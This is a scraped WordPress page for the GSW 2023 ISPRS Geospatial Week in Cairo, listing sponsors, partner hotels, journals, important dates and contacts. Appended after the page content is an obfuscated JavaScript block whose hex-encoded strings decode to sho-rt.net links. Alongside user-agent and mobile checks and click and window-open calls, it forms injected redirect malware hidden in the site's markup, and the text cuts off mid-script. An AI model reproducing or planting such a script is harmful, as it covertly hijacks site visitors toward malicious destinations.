css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const 